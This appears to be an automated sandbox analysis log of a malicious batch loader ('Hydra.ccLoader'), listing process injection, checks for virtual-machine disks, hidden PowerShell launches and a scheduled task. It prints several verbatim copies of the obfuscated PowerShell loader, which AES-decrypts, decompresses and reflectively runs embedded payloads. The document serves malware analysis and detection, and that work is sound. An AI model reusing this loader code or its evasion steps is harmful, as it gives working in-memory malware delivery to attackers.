Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 15E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1C115C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BB497C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3DBE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 220A9EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 12198470000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function laqse($iuumh){ $vwfbp=[system.security.cryptography.aes]::create(); $vwfbp.mode=[system.security.cryptography.ciphermode]::cbc; $vwfbp.padding=[system.security.cryptography.paddingmode]::pkcs7; $vwfbp.key=[system.convert]::frombase64string('di4ddcyzts705y2cfjcrjbu5+7iub/rxfdrbd9burks='); $vwfbp.iv=[system.convert]::frombase64string('zryk7n3awcgs6soqeb0/yq=='); $mwnkd=$vwfbp.createdecryptor(); $fmjvb=$mwnkd.transformfinalblock($iuumh, 0, $iuumh.length); $mwnkd.dispose(); $vwfbp.dispose(); $fmjvb;}function odxli($iuumh){ invoke-expression '$jkynf=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$iuumh);'.replace('*', ''); invoke-expression '$ywdgv=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$riwlb=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($jkynf, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $riwlb.copyto($ywdgv); $riwlb.dispose(); $jkynf.dispose(); $ywdgv.dispose(); $ywdgv.toarray();}function kbrbr($iuumh,$wjuzc){ invoke-expression '$vduep=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$iuumh);'.replace('*', ''); invoke-expression '$ngmne=$vduep.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$ngmne.*i*n*v*o*k*e*($null, $wjuzc);'.replace('*', '');}$xthln = 'c:\users\user\desktop\hydra.ccloader.bat';$host.ui.rawui.windowtitle = $xthln;$pkwbz=[system.io.file]::readalltext($xthln).split([environment]::newline);foreach ($gxnwh in $pkwbz) { if ($gxnwh.startswith('veymi')) { $jxznr=$gxnwh.substring(5); break; }}$elwub=[string[]]$jxznr.split('\');invoke-expression '$mus = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$ray = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$acu = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');kbrbr $mus $null;kbrbr $ray $null;kbrbr $acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function laqse($iuumh){ $vwfbp=[system.security.cryptography.aes]::create(); $vwfbp.mode=[system.security.cryptography.ciphermode]::cbc; $vwfbp.padding=[system.security.cryptography.paddingmode]::pkcs7; $vwfbp.key=[system.convert]::frombase64string('di4ddcyzts705y2cfjcrjbu5+7iub/rxfdrbd9burks='); $vwfbp.iv=[system.convert]::frombase64string('zryk7n3awcgs6soqeb0/yq=='); $mwnkd=$vwfbp.createdecryptor(); $fmjvb=$mwnkd.transformfinalblock($iuumh, 0, $iuumh.length); $mwnkd.dispose(); $vwfbp.dispose(); $fmjvb;}function odxli($iuumh){ invoke-expression '$jkynf=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$iuumh);'.replace('*', ''); invoke-expression '$ywdgv=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$riwlb=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($jkynf, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $riwlb.copyto($ywdgv); $riwlb.dispose(); $jkynf.dispose(); $ywdgv.dispose(); $ywdgv.toarray();}function kbrbr($iuumh,$wjuzc){ invoke-expression '$vduep=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$iuumh);'.replace('*', ''); invoke-expression '$ngmne=$vduep.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$ngmne.*i*n*v*o*k*e*($null, $wjuzc);'.replace('*', '');}$xthln = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $xthln;$pkwbz=[system.io.file]::readalltext($xthln).split([environment]::newline);foreach ($gxnwh in $pkwbz) { if ($gxnwh.startswith('veymi')) { $jxznr=$gxnwh.substring(5); break; }}$elwub=[string[]]$jxznr.split('\');invoke-expression '$mus = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$ray = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$acu = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');kbrbr $mus $null;kbrbr $ray $null;kbrbr $acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function laqse($iuumh){ $vwfbp=[system.security.cryptography.aes]::create(); $vwfbp.mode=[system.security.cryptography.ciphermode]::cbc; $vwfbp.padding=[system.security.cryptography.paddingmode]::pkcs7; $vwfbp.key=[system.convert]::frombase64string('di4ddcyzts705y2cfjcrjbu5+7iub/rxfdrbd9burks='); $vwfbp.iv=[system.convert]::frombase64string('zryk7n3awcgs6soqeb0/yq=='); $mwnkd=$vwfbp.createdecryptor(); $fmjvb=$mwnkd.transformfinalblock($iuumh, 0, $iuumh.length); $mwnkd.dispose(); $vwfbp.dispose(); $fmjvb;}function odxli($iuumh){ invoke-expression '$jkynf=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$iuumh);'.replace('*', ''); invoke-expression '$ywdgv=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$riwlb=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($jkynf, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $riwlb.copyto($ywdgv); $riwlb.dispose(); $jkynf.dispose(); $ywdgv.dispose(); $ywdgv.toarray();}function kbrbr($iuumh,$wjuzc){ invoke-expression '$vduep=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$iuumh);'.replace('*', ''); invoke-expression '$ngmne=$vduep.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$ngmne.*i*n*v*o*k*e*($null, $wjuzc);'.replace('*', '');}$xthln = 'c:\users\user\desktop\hydra.ccloader.bat';$host.ui.rawui.windowtitle = $xthln;$pkwbz=[system.io.file]::readalltext($xthln).split([environment]::newline);foreach ($gxnwh in $pkwbz) { if ($gxnwh.startswith('veymi')) { $jxznr=$gxnwh.substring(5); break; }}$elwub=[string[]]$jxznr.split('\');invoke-expression '$mus = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$ray = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$acu = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');kbrbr $mus $null;kbrbr $ray $null;kbrbr $acu (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function laqse($iuumh){ $vwfbp=[system.security.cryptography.aes]::create(); $vwfbp.mode=[system.security.cryptography.ciphermode]::cbc; $vwfbp.padding=[system.security.cryptography.paddingmode]::pkcs7; $vwfbp.key=[system.convert]::frombase64string('di4ddcyzts705y2cfjcrjbu5+7iub/rxfdrbd9burks='); $vwfbp.iv=[system.convert]::frombase64string('zryk7n3awcgs6soqeb0/yq=='); $mwnkd=$vwfbp.createdecryptor(); $fmjvb=$mwnkd.transformfinalblock($iuumh, 0, $iuumh.length); $mwnkd.dispose(); $vwfbp.dispose(); $fmjvb;}function odxli($iuumh){ invoke-expression '$jkynf=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$iuumh);'.replace('*', ''); invoke-expression '$ywdgv=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$riwlb=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($jkynf, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $riwlb.copyto($ywdgv); $riwlb.dispose(); $jkynf.dispose(); $ywdgv.dispose(); $ywdgv.toarray();}function kbrbr($iuumh,$wjuzc){ invoke-expression '$vduep=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$iuumh);'.replace('*', ''); invoke-expression '$ngmne=$vduep.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$ngmne.*i*n*v*o*k*e*($null, $wjuzc);'.replace('*', '');}$xthln = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $xthln;$pkwbz=[system.io.file]::readalltext($xthln).split([environment]::newline);foreach ($gxnwh in $pkwbz) { if ($gxnwh.startswith('veymi')) { $jxznr=$gxnwh.substring(5); break; }}$elwub=[string[]]$jxznr.split('\');invoke-expression '$mus = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$ray = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$acu = odxli (laqse ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($elwub[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');kbrbr $mus $null;kbrbr $ray $null;kbrbr $acu (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_0000000140002300
Source: dwm.exe, 0000000E.00000002.2859012512.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000E.00000000.1542346354.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
Source: winlogon.exe, 00000008.00000000.1489181017.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2793642510.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2865072940.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000008.00000000.1489181017.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2793642510.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2865072940.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: winlogon.exe, 00000008.00000000.1489181017.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2793642510.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2865072940.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
Source: winlogon.exe, 00000008.00000000.1489181017.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2793642510.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2865072940.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001CA7D1C2AF0 cpuid 8_3_000001CA7D1C2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-iM0vfZcH VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-iM0vfZcH VolumeInformationJump to behavior
